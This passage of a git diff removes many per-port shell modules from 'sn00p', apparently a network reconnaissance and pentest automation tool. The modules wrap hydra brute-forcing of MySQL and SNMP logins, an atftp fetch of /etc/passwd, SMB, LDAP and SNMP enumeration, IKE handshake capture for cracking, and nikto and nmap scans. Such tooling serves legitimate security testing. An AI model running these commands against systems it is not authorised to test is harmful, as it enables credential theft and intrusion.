HERE! ####################### - - -# get remote rpc services via rpcinfo -# TOOLS: rpcinfo -do_rpcinfo() -{ - opts="-p" - - rpcinfo ${opts} ${DHOST} 2>&1 - - return ${SUCCESS} -} - - -# go go go -run_audits - -# EOF diff --git a/automation/sn00p/source/src/modules/tcp/3306.sh b/automation/sn00p/source/src/modules/tcp/3306.sh deleted file mode 100644 index c5fe288..0000000 --- a/automation/sn00p/source/src/modules/tcp/3306.sh +++ /dev/null 
@@ -1,141 +0,0 @@ -#!/bin/sh -################################################################################ -# ____ _ __ # -# ___ __ __/ / /__ ___ ______ ______(_) /___ __ # -# / _ \/ // / / (_-" > /dev/null 2>&1 - then - IN_AUDITS="`echo ${IN_AUDITS} | sed "s/\<${inc}\>//g"`" - fi - done - - AUDITS="${IN_AUDITS}" - fi - - if [ ! -z "${EX_AUDITS}" ] - then - for exc in ${EX_AUDITS} - do - AUDITS="`echo ${AUDITS} | sed "s/\<${exc}\>//g"`" - done - fi - - # needed for stat line - num_audits="`echo ${AUDITS} | wc -w | tr -d ' '`" - - return ${SUCCESS} -} - - -# start all tools here - you do not need to change anything here -run_audits() -{ - j="0" - - filter_audits - - for audit in ${AUDITS} - do - j="`expr ${j} + 1`" - echo " -> running ${audit} (${j}/${num_audits})" - do_${audit} 2>&1 | tee -a "${audit}.log" > ${VERBOSE} 2>&1 - done - - return ${SUCCESS} -} - - -####################### DEFINE AND ADD YOUR STUFF HERE! ####################### - - -# bruteforce default logins via hydra -# TOOLS: hydra -do_hydra_mysql() -{ - opts="-e nsr -f -v" - - for i in ${ULISTS} - do - for j in ${PLISTS} - do - hydra ${opts} -L ${i} -P ${j} mysql://${DHOST}:${DPORT} 2>&1 - done - done - - return ${SUCCESS} -} - - -# go go go -run_audits - -# EOF diff --git a/automation/sn00p/source/src/modules/tcp/389.sh b/automation/sn00p/source/src/modules/tcp/389.sh deleted file mode 100644 index 80655ff..0000000 --- a/automation/sn00p/source/src/modules/tcp/389.sh +++ /dev/null 
@@ -1,135 +0,0 @@ -#!/bin/sh -################################################################################ -# ____ _ __ # -# ___ __ __/ / /__ ___ ______ ______(_) /___ __ # -# / _ \/ // / / (_-" > /dev/null 2>&1 - then - IN_AUDITS="`echo ${IN_AUDITS} | sed "s/\<${inc}\>//g"`" - fi - done - - AUDITS="${IN_AUDITS}" - fi - - if [ ! -z "${EX_AUDITS}" ] - then - for exc in ${EX_AUDITS} - do - AUDITS="`echo ${AUDITS} | sed "s/\<${exc}\>//g"`" - done - fi - - # needed for stat line - num_audits="`echo ${AUDITS} | wc -w | tr -d ' '`" - - return ${SUCCESS} -} - - -# start all tools here - you do not need to change anything here -run_audits() -{ - j="0" - - filter_audits - - for audit in ${AUDITS} - do - j="`expr ${j} + 1`" - echo " -> running ${audit} (${j}/${num_audits})" - do_${audit} 2>&1 | tee -a "${audit}.log" > ${VERBOSE} 2>&1 - done - - return ${SUCCESS} -} - - -####################### DEFINE AND ADD YOUR STUFF HERE! ####################### - - -# gather LDAP / AD information via ldapenum -# TOOLS: ldapenum.pl -do_ldapenum() -{ - opts="-U -G -E -v" - - ldapenum.pl ${opts} -i ${DHOST} 2>&1 - - return ${SUCCESS} -} - - -# go go go -run_audits - -# EOF diff --git a/automation/sn00p/source/src/modules/tcp/443.sh b/automation/sn00p/source/src/modules/tcp/443.sh deleted file mode 100644 index 810fcf4..0000000 --- a/automation/sn00p/source/src/modules/tcp/443.sh +++ /dev/null 
@@ -1,254 +0,0 @@ -#!/bin/sh -################################################################################ -# ____ _ __ # -# ___ __ __/ / /__ ___ ______ ______(_) /___ __ # -# / _ \/ // / / (_-" > /dev/null 2>&1 - then - IN_AUDITS="`echo ${IN_AUDITS} | sed "s/\<${inc}\>//g"`" - fi - done - - AUDITS="${IN_AUDITS}" - fi - - if [ ! -z "${EX_AUDITS}" ] - then - for exc in ${EX_AUDITS} - do - AUDITS="`echo ${AUDITS} | sed "s/\<${exc}\>//g"`" - done - fi - - # needed for stat line - num_audits="`echo ${AUDITS} | wc -w | tr -d ' '`" - - return ${SUCCESS} -} - - -# start all tools here - you do not need to change anything here -run_audits() -{ - j="0" - - filter_audits - - for audit in ${AUDITS} - do - j="`expr ${j} + 1`" - echo " -> running ${audit} (${j}/${num_audits})" - do_${audit} 2>&1 | tee -a "${audit}.log" > ${VERBOSE} 2>&1 - done - - return ${SUCCESS} -} - - - -####################### DEFINE AND ADD YOUR STUFF HERE! ####################### - - -# globals -domain="`head -1 ../../host/default/domain.log 2> /dev/null`" -ua="User-Agent: sn00p.sh" -ref="Referrer: http://www.sn00p.sh/" -clen="Content-Length: -1" - - -# send HEAD request -# TOOLS: openssl -do_https_head() -{ - # 1.0 - echo -e "HEAD / HTTP/1.0\r\n\n" | - openssl s_client -connect ${DHOST}:${DPORT} 2>&1 - - # force new line - echo "" - - # 1.1 - echo -e "HEAD / HTTP/1.1\nHOST:${domain}\n${ua}\n${ref}\n${clen}\r\n\n" | - openssl s_client -connect ${DHOST}:${DPORT} 2>&1 - - return ${SUCCESS} -} - - -# send GET request -# TOOLS: openssl -do_https_get() -{ - # 1.0 - echo -e "GET / HTTP/1.0\r\n\n" | - openssl s_client -connect ${DHOST}:${DPORT} 2>&1 - - # force new line - echo "" - - # 1.1 - echo -e "GET / HTTP/1.1\nHOST:${domain}\n${ua}\n${ref}\n${clen}\r\n\n" | - openssl s_client -connect ${DHOST}:${DPORT} 2>&1 - - return ${SUCCESS} -} - -# send POST request -# TOOLS: openssl -do_https_post() -{ - # 1.0 - echo -e "POST / HTTP/1.0\r\n\n" | - openssl s_client -connect ${DHOST}:${DPORT} 2>&1 - - - # force 
new line - echo "" - - # 1.1 - echo -e "POST / HTTP/1.1\nHOST:${domain}\n${ua}\n${ref}\n${clen}\r\n\n" | - openssl s_client -connect ${DHOST}:${DPORT} 2>&1 - - return ${SUCCESS} -} - - -# send OPTIONS request -# TOOLS: openssl -do_https_options() -{ - # 1.0 - echo -e "OPTIONS / HTTP/1.0\r\n\n" | - openssl s_client -connect ${DHOST}:${DPORT} 2>&1 - - # force new line - echo "" - - # 1.1 - echo -e "OPTIONS / HTTP/1.1\nHOST:${domain}\n${ua}\n${ref}\n${clen}\r\n\n" | - openssl s_client -connect ${DHOST}:${DPORT} 2>&1 - - return ${SUCCESS} -} - - -# run httping -# TOOLS: httping -do_https_httping() -{ - opts="-a -t 3 -c 2 -l -I sn00p.sh -R http://sn00p.sh/" - - httping ${opts} -p ${DPORT} -h ${DHOST} 2>&1 - - return ${SUCCESS} -} - - -# fingerprint server via httprint -# TOOLS: httprint -do_https_httprint() -{ - opts="-P0 -th 16" - sigs="/usr/share/httprint/signatures.txt" - - httprint -h "http://${DHOST}:${DPORT}" -s ${sigs} ${opts} 2>&1 - - return ${SUCCESS} -} - - -# try to get infos over rpc endpoint mapper via rpcdump.py -# TOOLS: rpcdump.py -do_https_rpcdump() -{ - rpcdump.py ${DHOST} "80/HTTP" 2>&1 - - return ${SUCCESS} -} - - -# crawl website via nikto -# TOOLS: nikto.sh -do_https_nikto() -{ - opts="-C all -ssl -no404" - - nikto.sh ${opts} -p ${DPORT} -h ${DHOST} 2>&1 - - return ${SUCCESS} -} - - -# go go go -run_audits - -# EOF diff --git a/automation/sn00p/source/src/modules/tcp/445.sh b/automation/sn00p/source/src/modules/tcp/445.sh deleted file mode 100644 index 3a457c9..0000000 --- a/automation/sn00p/source/src/modules/tcp/445.sh +++ /dev/null 
@@ -1,145 +0,0 @@ -#!/bin/sh -################################################################################ -# ____ _ __ # -# ___ __ __/ / /__ ___ ______ ______(_) /___ __ # -# / _ \/ // / / (_-" > /dev/null 2>&1 - then - IN_AUDITS="`echo ${IN_AUDITS} | sed "s/\<${inc}\>//g"`" - fi - done - - AUDITS="${IN_AUDITS}" - fi - - if [ ! -z "${EX_AUDITS}" ] - then - for exc in ${EX_AUDITS} - do - AUDITS="`echo ${AUDITS} | sed "s/\<${exc}\>//g"`" - done - fi - - # needed for stat line - num_audits="`echo ${AUDITS} | wc -w | tr -d ' '`" - - return ${SUCCESS} -} - - -# start all tools here - you do not need to change anything here -run_audits() -{ - j="0" - - filter_audits - - for audit in ${AUDITS} - do - j="`expr ${j} + 1`" - echo " -> running ${audit} (${j}/${num_audits})" - do_${audit} 2>&1 | tee -a "${audit}.log" > ${VERBOSE} 2>&1 - done - - return ${SUCCESS} -} - - -####################### DEFINE AND ADD YOUR STUFF HERE! ####################### - - -# try to get infos over msrpc endpoint mapper via rpcdump.py -# TOOLS: rpcdump.py -do_rpcdump() -{ - rpcdump.py ${DHOST} "445/SMB" 2>&1 - - return ${SUCCESS} -} - - -# try to get as much as possible via enum4linux -# TOOLS: enum4linux -do_enum4linux() -{ - opts="-a" - - enum4linux ${opts} ${DHOST} 2>&1 - - return ${SUCCESS} -} - - -# go go go -run_audits - -# EOF diff --git a/automation/sn00p/source/src/modules/tcp/500.sh b/automation/sn00p/source/src/modules/tcp/500.sh deleted file mode 100644 index bfc7a02..0000000 --- a/automation/sn00p/source/src/modules/tcp/500.sh +++ /dev/null 
@@ -1,159 +0,0 @@ -#!/bin/sh -################################################################################ -# ____ _ __ # -# ___ __ __/ / /__ ___ ______ ______(_) /___ __ # -# / _ \/ // / / (_-" > /dev/null 2>&1 - then - IN_AUDITS="`echo ${IN_AUDITS} | sed "s/\<${inc}\>//g"`" - fi - done - - AUDITS="${IN_AUDITS}" - fi - - if [ ! -z "${EX_AUDITS}" ] - then - for exc in ${EX_AUDITS} - do - AUDITS="`echo ${AUDITS} | sed "s/\<${exc}\>//g"`" - done - fi - - # needed for stat line - num_audits="`echo ${AUDITS} | wc -w | tr -d ' '`" - - return ${SUCCESS} -} - - -# start all tools here - you do not need to change anything here -run_audits() -{ - j="0" - - filter_audits - - for audit in ${AUDITS} - do - j="`expr ${j} + 1`" - echo " -> running ${audit} (${j}/${num_audits})" - do_${audit} 2>&1 | tee -a "${audit}.log" > ${VERBOSE} 2>&1 - done - - return ${SUCCESS} -} - - -####################### DEFINE AND ADD YOUR STUFF HERE! ####################### - - -# connect and try to get infos about logged in users -# TOOLS: ike-scan -do_ikescan() -{ - opts="" - - ike-scan ${DHOST} 2>&1 - - return ${SUCCESS} -} - - -# probe ike requests and enumerate ike related stuff via IKEProber.pl -# TOOLS: ikeprober -do_ikeprober() -{ - opts="" - - perl ikeprober -d ${DHOST} 2>&1 - - return ${SUCCESS} -} - - -# capture authentication messages (aggressive mode IKE) via ikecrack-snarf -# TOOLS: ikecrack-snarf-1.00.pl -do_ikecrack_snarf() -{ - opts="" - - ikecrack-snarf-1.00.pl "${DHOST}.${DPORT}" 2>&1 - - return ${SUCCESS} -} - - -# go go go -run_audits - -# EOF diff --git a/automation/sn00p/source/src/modules/tcp/53.sh b/automation/sn00p/source/src/modules/tcp/53.sh deleted file mode 100644 index c917459..0000000 --- a/automation/sn00p/source/src/modules/tcp/53.sh +++ /dev/null 
@@ -1,177 +0,0 @@ -#!/bin/sh -################################################################################ -# ____ _ __ # -# ___ __ __/ / /__ ___ ______ ______(_) /___ __ # -# / _ \/ // / / (_-" > /dev/null 2>&1 - then - IN_AUDITS="`echo ${IN_AUDITS} | sed "s/\<${inc}\>//g"`" - fi - done - - AUDITS="${IN_AUDITS}" - fi - - if [ ! -z "${EX_AUDITS}" ] - then - for exc in ${EX_AUDITS} - do - AUDITS="`echo ${AUDITS} | sed "s/\<${exc}\>//g"`" - done - fi - - # needed for stat line - num_audits="`echo ${AUDITS} | wc -w | tr -d ' '`" - - return ${SUCCESS} -} - - -# start all tools here - you do not need to change anything here -run_audits() -{ - j="0" - - filter_audits - - for audit in ${AUDITS} - do - j="`expr ${j} + 1`" - echo " -> running ${audit} (${j}/${num_audits})" - do_${audit} 2>&1 | tee -a "${audit}.log" > ${VERBOSE} 2>&1 - done - - return ${SUCCESS} -} - - -####################### DEFINE AND ADD YOUR STUFF HERE! ####################### - - -# try to get version of bind via host -# TOOLS: host -do_version_bind_host() -{ - opts="-c chaos -t txt version.bind" - - host ${opts} ${DHOST} 2>&1 - -} - - -# try to get version of bind via dig -# HOST: dig -do_version_bind_dig() -{ - opts="version.bind txt chaos" - - dig @${DHOST} ${opts} 2>&1 - - return ${SUCCESS} -} - - -# test for cache sn00ping -# TOOLS: dig -do_snoop_cache() -{ - opts="A +norecurse" - site="youporn.com" - - # make first request - dig @${DHOST} ${site} ${opts} 2>&1 | grep -i "answer" - - # just newline - echo - - # make second request (ANSWER flag) - dig @${DHOST} ${site} ${opts} 2>&1 | grep -i "answer" - - return ${SUCCESS} -} - - -# fingerprint dns via fpdns -# TOOLS: fpdns -do_fpdns() -{ - opts="-c -f" - - fpdns ${opts} ${DHOST} - return ${SUCCESS} -} - - -# go go go -run_audits - -# EOF diff --git a/automation/sn00p/source/src/modules/tcp/69.sh b/automation/sn00p/source/src/modules/tcp/69.sh deleted file mode 100644 index 15e184f..0000000 
--- a/automation/sn00p/source/src/modules/tcp/69.sh +++ /dev/null @@ -1,135 +0,0 @@ -#!/bin/sh -################################################################################ -# ____ _ __ # -# ___ __ __/ / /__ ___ ______ ______(_) /___ __ # -# / _ \/ // / / (_-" > /dev/null 2>&1 - then - IN_AUDITS="`echo ${IN_AUDITS} | sed "s/\<${inc}\>//g"`" - fi - done - - AUDITS="${IN_AUDITS}" - fi - - if [ ! -z "${EX_AUDITS}" ] - then - for exc in ${EX_AUDITS} - do - AUDITS="`echo ${AUDITS} | sed "s/\<${exc}\>//g"`" - done - fi - - # needed for stat line - num_audits="`echo ${AUDITS} | wc -w | tr -d ' '`" - - return ${SUCCESS} -} - - -# start all tools here - you do not need to change anything here -run_audits() -{ - j="0" - - filter_audits - - for audit in ${AUDITS} - do - j="`expr ${j} + 1`" - echo " -> running ${audit} (${j}/${num_audits})" - do_${audit} 2>&1 | tee -a "${audit}.log" > ${VERBOSE} 2>&1 - done - - return ${SUCCESS} -} - - -####################### DEFINE AND ADD YOUR STUFF HERE! ####################### - - -# connect and try to get passwd via atfp -# TOOLS: atftp -do_atftp_connect() -{ - opts="--verbose -g -r /etc/passwd -l passwd" - - atftp ${opts} ${DHOST} ${DPORT} - - return ${SUCCESS} -} - - -# go go go -run_audits - -# EOF diff --git a/automation/sn00p/source/src/modules/tcp/79.sh b/automation/sn00p/source/src/modules/tcp/79.sh deleted file mode 100644 index 60b7714..0000000 --- a/automation/sn00p/source/src/modules/tcp/79.sh +++ /dev/null 
@@ -1,143 +0,0 @@ -#!/bin/sh -################################################################################ -# ____ _ __ # -# ___ __ __/ / /__ ___ ______ ______(_) /___ __ # -# / _ \/ // / / (_-" > /dev/null 2>&1 - then - IN_AUDITS="`echo ${IN_AUDITS} | sed "s/\<${inc}\>//g"`" - fi - done - - AUDITS="${IN_AUDITS}" - fi - - if [ ! -z "${EX_AUDITS}" ] - then - for exc in ${EX_AUDITS} - do - AUDITS="`echo ${AUDITS} | sed "s/\<${exc}\>//g"`" - done - fi - - # needed for stat line - num_audits="`echo ${AUDITS} | wc -w | tr -d ' '`" - - return ${SUCCESS} -} - - -# start all tools here - you do not need to change anything here -run_audits() -{ - j="0" - - filter_audits - - for audit in ${AUDITS} - do - j="`expr ${j} + 1`" - echo " -> running ${audit} (${j}/${num_audits})" - do_${audit} 2>&1 | tee -a "${audit}.log" > ${VERBOSE} 2>&1 - done - - return ${SUCCESS} -} - - -####################### DEFINE AND ADD YOUR STUFF HERE! ####################### - - -# finger all users -# TOOLS: finger -do_finger_users() -{ - finger -l "@${DHOST}" 2>&1 - - return ${SUCCESS} -} - - -# finger all users and more infos -# TOOLS: finger -do_finger_more() -{ - finger "0@${DHOST}" 2>&1 - - return ${SUCCESS} -} - - -# go go go -run_audits - -# EOF diff --git a/automation/sn00p/source/src/modules/tcp/80.sh b/automation/sn00p/source/src/modules/tcp/80.sh deleted file mode 100644 index 28e9ad8..0000000 --- a/automation/sn00p/source/src/modules/tcp/80.sh +++ /dev/null 
@@ -1,248 +0,0 @@ -#!/bin/sh -################################################################################ -# ____ _ __ # -# ___ __ __/ / /__ ___ ______ ______(_) /___ __ # -# / _ \/ // / / (_-" > /dev/null 2>&1 - then - IN_AUDITS="`echo ${IN_AUDITS} | sed "s/\<${inc}\>//g"`" - fi - done - - AUDITS="${IN_AUDITS}" - fi - - if [ ! -z "${EX_AUDITS}" ] - then - for exc in ${EX_AUDITS} - do - AUDITS="`echo ${AUDITS} | sed "s/\<${exc}\>//g"`" - done - fi - - # needed for stat line - num_audits="`echo ${AUDITS} | wc -w | tr -d ' '`" - - return ${SUCCESS} -} - - -# start all tools here - you do not need to change anything here -run_audits() -{ - j="0" - - filter_audits - - for audit in ${AUDITS} - do - j="`expr ${j} + 1`" - echo " -> running ${audit} (${j}/${num_audits})" - do_${audit} 2>&1 | tee -a "${audit}.log" > ${VERBOSE} 2>&1 - done - - return ${SUCCESS} -} - - -####################### DEFINE AND ADD YOUR STUFF HERE! ####################### - - -# http header stuff -domain="`head -1 ../../host/default/domain.log 2> /dev/null`" -ua="User-Agent: sn00p.sh" -ref="Referrer: http://www.sn00p.sh/" -clen="Content-Length: -1" - - -# send HEAD request -# TOOLS: ncat -do_http_head() -{ - # 1.0 - echo -e "HEAD / HTTP/1.0\r\n\n" | ncat -v -w 3 ${DHOST} ${DPORT} 2>&1 - - # force new line - echo "" - - # 1.1 - echo -e "HEAD / HTTP/1.1\nHOST:${domain}\n${ua}\n${ref}\n${clen}\r\n\n" | - ncat -v -w 3 ${DHOST} ${DPORT} 2>&1 - - return ${SUCCESS} -} - - -# send GET request -# TOOLS: ncat -do_http_get() -{ - # 1.0 - echo -e "GET / HTTP/1.0\r\n\n" | ncat -v -w 3 ${DHOST} ${DPORT} 2>&1 - - # force new line - echo "" - - # 1.1 - echo -e "GET / HTTP/1.1\nHOST:${domain}\n${ua}\n${ref}\n${clen}\r\n\n" | - ncat -v -w 3 ${DHOST} ${DPORT} 2>&1 - - return ${SUCCESS} -} - -# send POST request -# TOOLS: ncat -do_http_post() -{ - # 1.0 - echo -e "POST / HTTP/1.0\r\n\n" | ncat -v -w 3 ${DHOST} ${DPORT} 2>&1 - - # force new line - echo "" - - # 1.1 - echo -e "POST / 
HTTP/1.1\nHOST:${domain}\n${ua}\n${ref}\n${clen}\r\n\n" | - ncat -v -w 3 ${DHOST} ${DPORT} 2>&1 - - return ${SUCCESS} -} - - -# send OPTIONS request -# TOOLS: ncat -do_http_options() -{ - # 1.0 - echo -e "OPTIONS / HTTP/1.0\r\n\n" | ncat -v -w 3 ${DHOST} ${DPORT} 2>&1 - - # force new line - echo "" - - # 1.1 - echo -e "OPTIONS / HTTP/1.1\nHOST:${domain}\n${ua}\n${ref}\n${clen}\r\n\n" | - ncat -v -w 3 ${DHOST} ${DPORT} 2>&1 - - return ${SUCCESS} -} - - -# run httping -# TOOLS: httping -do_http_httping() -{ - opts="-a -t 3 -c 2 -I sn00p.sh -R http://sn00p.sh/" - - httping ${opts} -p ${DPORT} -h ${DHOST} 2>&1 - - return ${SUCCESS} -} - - -# fingerprint server via httprint -# TOOLS: httprint -do_http_httprint() -{ - opts="-P0 -th 16" - sigs="/usr/share/httprint/signatures.txt" - - httprint -h "http://${DHOST}:${DPORT}" -s ${sigs} ${opts} 2>&1 - - return ${SUCCESS} -} - - -# try to get infos over rpc endpoint mapper via rpcdump.py -# TOOLS: rpcdump.py -do_http_rpcdump() -{ - rpcdump.py ${DHOST} "80/HTTP" 2>&1 - - return ${SUCCESS} -} - - -# crawl website via nikto -# TOOLS: nikto.sh -do_http_nikto() -{ - opts="-C all -no404" - - nikto.sh ${opts} -p ${DPORT} -h ${DHOST} 2>&1 - - return ${SUCCESS} -} - - -# go go go -run_audits - -# EOF diff --git a/automation/sn00p/source/src/modules/tcp/default.sh b/automation/sn00p/source/src/modules/tcp/default.sh deleted file mode 100644 index 5a5eb99..0000000 --- a/automation/sn00p/source/src/modules/tcp/default.sh +++ /dev/null 
@@ -1,167 +0,0 @@ -#!/bin/sh -################################################################################ -# ____ _ __ # -# ___ __ __/ / /__ ___ ______ ______(_) /___ __ # -# / _ \/ // / / (_-" > /dev/null 2>&1 - then - IN_AUDITS="`echo ${IN_AUDITS} | sed "s/\<${inc}\>//g"`" - fi - done - - AUDITS="${IN_AUDITS}" - fi - - if [ ! -z "${EX_AUDITS}" ] - then - for exc in ${EX_AUDITS} - do - AUDITS="`echo ${AUDITS} | sed "s/\<${exc}\>//g"`" - done - fi - - # needed for stat line - num_audits="`echo ${AUDITS} | wc -w | tr -d ' '`" - - return ${SUCCESS} -} - - -# start all tools here - you do not need to change anything here -run_audits() -{ - j="0" - - filter_audits - - for audit in ${AUDITS} - do - j="`expr ${j} + 1`" - echo " -> running ${audit} (${j}/${num_audits})" - do_${audit} 2>&1 | tee -a "${audit}.log" > ${VERBOSE} 2>&1 - done - - return ${SUCCESS} -} - - -####################### DEFINE AND ADD YOUR STUFF HERE! ####################### - - -# connect and try to read banner or at least some response (bytes) via netcat -# TOOLS: ncat -do_ncat_connect() -{ - echo "" | ncat -v -w 3 ${DHOST} ${DPORT} 2>&1 - - return ${SUCCESS} -} - - -# read banner via amap -# TOOLS: amap -do_amap() -{ - opts="-bqv -c 64 -C 2 -T 3 -t 3" - - amap ${opts} ${DHOST} ${DPORT} 2>&1 - - return ${SUCCESS} -} - - -# read banner, do rpc scans, fingerprint and run NSE script via nmap -# TOOLS: nmap -do_nmap_banner() -{ - opts="-n -sTCV -PN --version-all" - - nmap ${opts} -p ${DPORT} ${DHOST} 2>&1 - - return ${SUCCESS} -} - - -# connect via SSL and try to read -# TOOLS: openssl -do_openssl_connect() -{ - echo "" | openssl s_client -connect ${DHOST}:${DPORT} 2>&1 - - return ${SUCCESS} -} - - -# go go go -run_audits - -# EOF diff --git a/automation/sn00p/source/src/modules/udp/135.sh b/automation/sn00p/source/src/modules/udp/135.sh deleted file mode 100644 index bb7fed0..0000000 --- a/automation/sn00p/source/src/modules/udp/135.sh +++ /dev/null 
@@ -1,133 +0,0 @@ -#!/bin/sh -################################################################################ -# ____ _ __ # -# ___ __ __/ / /__ ___ ______ ______(_) /___ __ # -# / _ \/ // / / (_-" > /dev/null 2>&1 - then - IN_AUDITS="`echo ${IN_AUDITS} | sed "s/\<${inc}\>//g"`" - fi - done - - AUDITS="${IN_AUDITS}" - fi - - if [ ! -z "${EX_AUDITS}" ] - then - for exc in ${EX_AUDITS} - do - AUDITS="`echo ${AUDITS} | sed "s/\<${exc}\>//g"`" - done - fi - - # needed for stat line - num_audits="`echo ${AUDITS} | wc -w | tr -d ' '`" - - return ${SUCCESS} -} - - -# start all tools here - you do not need to change anything here -run_audits() -{ - j="0" - - filter_audits - - for audit in ${AUDITS} - do - j="`expr ${j} + 1`" - echo " -> running ${audit} (${j}/${num_audits})" - do_${audit} 2>&1 | tee -a "${audit}.log" > ${VERBOSE} 2>&1 - done - - return ${SUCCESS} -} - - -####################### DEFINE AND ADD YOUR STUFF HERE! ####################### - - -# try to get infos over msrpc endpoint mapper via rpcdump.py -# TOOLS: rpcdump.py -do_rpcdump() -{ - rpcdump.py ${DHOST} "135/UDP" 2>&1 - - return ${SUCCESS} -} - - -# go go go -run_audits - -# EOF diff --git a/automation/sn00p/source/src/modules/udp/137.sh b/automation/sn00p/source/src/modules/udp/137.sh deleted file mode 100644 index 8ff5a36..0000000 --- a/automation/sn00p/source/src/modules/udp/137.sh +++ /dev/null 
@@ -1,157 +0,0 @@ -#!/bin/sh -################################################################################ -# ____ _ __ # -# ___ __ __/ / /__ ___ ______ ______(_) /___ __ # -# / _ \/ // / / (_-" > /dev/null 2>&1 - then - IN_AUDITS="`echo ${IN_AUDITS} | sed "s/\<${inc}\>//g"`" - fi - done - - AUDITS="${IN_AUDITS}" - fi - - if [ ! -z "${EX_AUDITS}" ] - then - for exc in ${EX_AUDITS} - do - AUDITS="`echo ${AUDITS} | sed "s/\<${exc}\>//g"`" - done - fi - - # needed for stat line - num_audits="`echo ${AUDITS} | wc -w | tr -d ' '`" - - return ${SUCCESS} -} - - -# start all tools here - you do not need to change anything here -run_audits() -{ - j="0" - - filter_audits - - for audit in ${AUDITS} - do - j="`expr ${j}+ 1`" - echo " -> running ${audit} (${j}/${num_audits})" - do_${audit} 2>&1 | tee -a "${audit}.log" > ${VERBOSE} 2>&1 - done - - return ${SUCCESS} -} - - -####################### DEFINE AND ADD YOUR STUFF HERE! ####################### - - -# audit netbios via nbaudit -# TOOLS: nbaudit -do_nbaudit() -{ - nbaudit ${DHOST} 2>&1 - - return ${SUCCESS} -} - - -# scan for netbios infos via nbtscan -# TOOLS: nbtscan -do_nbtscan() -{ - opts="-v -r" - - nbtscan ${opts} ${DHOST} 2>&1 - - return ${SUCCESS} -} - - -# scan for netbios infos via nmbscan -# TOOLS: nmbscan -do_nmbscan() -{ - opts="-h" - - nmbscan ${opts} ${DHOST} 2>&1 - - return ${SUCCESS} -} - - -# go go go -run_audits - -# EOF diff --git a/automation/sn00p/source/src/modules/udp/161.sh b/automation/sn00p/source/src/modules/udp/161.sh deleted file mode 100644 index ff3d24d..0000000 --- a/automation/sn00p/source/src/modules/udp/161.sh +++ /dev/null 
@@ -1,174 +0,0 @@ -#!/bin/sh -################################################################################ -# ____ _ __ # -# ___ __ __/ / /__ ___ ______ ______(_) /___ __ # -# / _ \/ // / / (_-" > /dev/null 2>&1 - then - IN_AUDITS="`echo ${IN_AUDITS} | sed "s/\<${inc}\>//g"`" - fi - done - - AUDITS="${IN_AUDITS}" - fi - - if [ ! -z "${EX_AUDITS}" ] - then - for exc in ${EX_AUDITS} - do - AUDITS="`echo ${AUDITS} | sed "s/\<${exc}\>//g"`" - done - fi - - # needed for stat line - num_audits="`echo ${AUDITS} | wc -w | tr -d ' '`" - - return ${SUCCESS} -} - - -# start all tools here - you do not need to change anything here -run_audits() -{ - j="0" - - filter_audits - - for audit in ${AUDITS} - do - j="`expr ${j} + 1`" - echo " -> running ${audit} (${j}/${num_audits})" - do_${audit} 2>&1 | tee -a "${audit}.log" > ${VERBOSE} 2>&1 - done - - return ${SUCCESS} -} - - -####################### DEFINE AND ADD YOUR STUFF HERE! ####################### - - -# get infos over version 1 via snmpwalk -# TOOLS: snmpwalk -do_snmpwalk_v1() -{ - opts="-v 1 -c public" - - snmpwalk ${opts} ${DHOST} 2>&1 - - return ${SUCCESS} -} - - -# get infos over version 2 via snmpwalk -# TOOLS: snmpwalk -do_snmpwalk_v2() -{ - opts="-c public -v 2c" - - snmpwalk ${opts} ${DHOST} 2>&1 - - return ${SUCCESS} -} - - -# get infos via onesixtyone -# TOOLS: onesixtyone -do_onesixtyone() -{ - opts="-d" - - onesixtyone ${opts} ${DHOST} "public" 2>&1 - - return ${SUCCESS} -} - - -# bruteforce via hydra -# TOOLS: hydra -do_hydra_snmp() -{ - opts="-e nsr -f -v" - - for i in ${PLISTS} - do - hydra ${opts} -P ${i} "snmp://${DHOST}" 2>&1 - done - - return ${SUCCESS} -} - - -# go go go -run_audits - -# EOF diff --git a/automation/sn00p/source/src/modules/udp/2049.sh b/automation/sn00p/source/src/modules/udp/2049.sh deleted file mode 100644 index 848bd90..0000000 --- a/automation/sn00p/source/src/modules/udp/2049.sh +++ /dev/null 
@@ -1,147 +0,0 @@ -#!/bin/sh -################################################################################ -# ____ _ __ # -# ___ __ __/ / /__ ___ ______ ______(_) /___ __ # -# / _ \/ // / / (_-" > /dev/null 2>&1 - then - IN_AUDITS="`echo ${IN_AUDITS} | sed "s/\<${inc}\>//g"`" - fi - done - - AUDITS="${IN_AUDITS}" - fi - - if [ ! -z "${EX_AUDITS}" ] - then - for exc in ${EX_AUDITS} - do - AUDITS="`echo ${AUDITS} | sed "s/\<${exc}\>//g"`" - done - fi - - # needed for stat line - num_audits="`echo ${AUDITS} | wc -w | tr -d ' '`" - - return ${SUCCESS} -} - - -# start all tools here - you do not need to change anything here -run_audits() -{ - j="0" - - filter_audits - - for audit in ${AUDITS} - do - j="`expr ${j} + 1`" - echo " -> running ${audit} (${j}/${num_audits})" - do_${audit} 2>&1 | tee -a "${audit}.log" > ${VERBOSE} 2>&1 - done - - return ${SUCCESS} -} - - -####################### DEFINE AND ADD YOUR STUFF HERE! ####################### - - -# get exported shares / directories via showmount -# TOOLS: showmount -do_showmount() -{ - opts="-e" - - showmount ${opts} ${DHOST} 2>&1 - - return ${SUCCESS} -} - - -# get infos about clients connected to mounted dirs via showmount -# TOOLS: showmount -do_showmount_clients() -{ - opts="-a" - - showmount ${opts} ${DHOST} 2>&1 - - return ${SUCCESS} -} - - -# go go go -run_audits - -# EOF diff --git a/automation/sn00p/source/src/modules/udp/500.sh b/automation/sn00p/source/src/modules/udp/500.sh deleted file mode 100644 index ccf6751..0000000 --- a/automation/sn00p/source/src/modules/udp/500.sh +++ /dev/null 
@@ -1,159 +0,0 @@ -#!/bin/sh -################################################################################ -# ____ _ __ # -# ___ __ __/ / /__ ___ ______ ______(_) /___ __ # -# / _ \/ // / / (_-" > /dev/null 2>&1 - then - IN_AUDITS="`echo ${IN_AUDITS} | sed "s/\<${inc}\>//g"`" - fi - done - - AUDITS="${IN_AUDITS}" - fi - - if [ ! -z "${EX_AUDITS}" ] - then - for exc in ${EX_AUDITS} - do - AUDITS="`echo ${AUDITS} | sed "s/\<${exc}\>//g"`" - done - fi - - # needed for stat line - num_audits="`echo ${AUDITS} | wc -w | tr -d ' '`" - - return ${SUCCESS} -} - - -# start all tools here - you do not need to change anything here -run_audits() -{ - j="0" - - filter_audits - - for audit in ${AUDITS} - do - j="`expr ${j} + 1`" - echo " -> running ${audit} (${j}/${num_audits})" - do_${audit} 2>&1 | tee -a "${audit}.log" > ${VERBOSE} 2>&1 - done - - return ${SUCCESS} -} - - -####################### DEFINE AND ADD YOUR STUFF 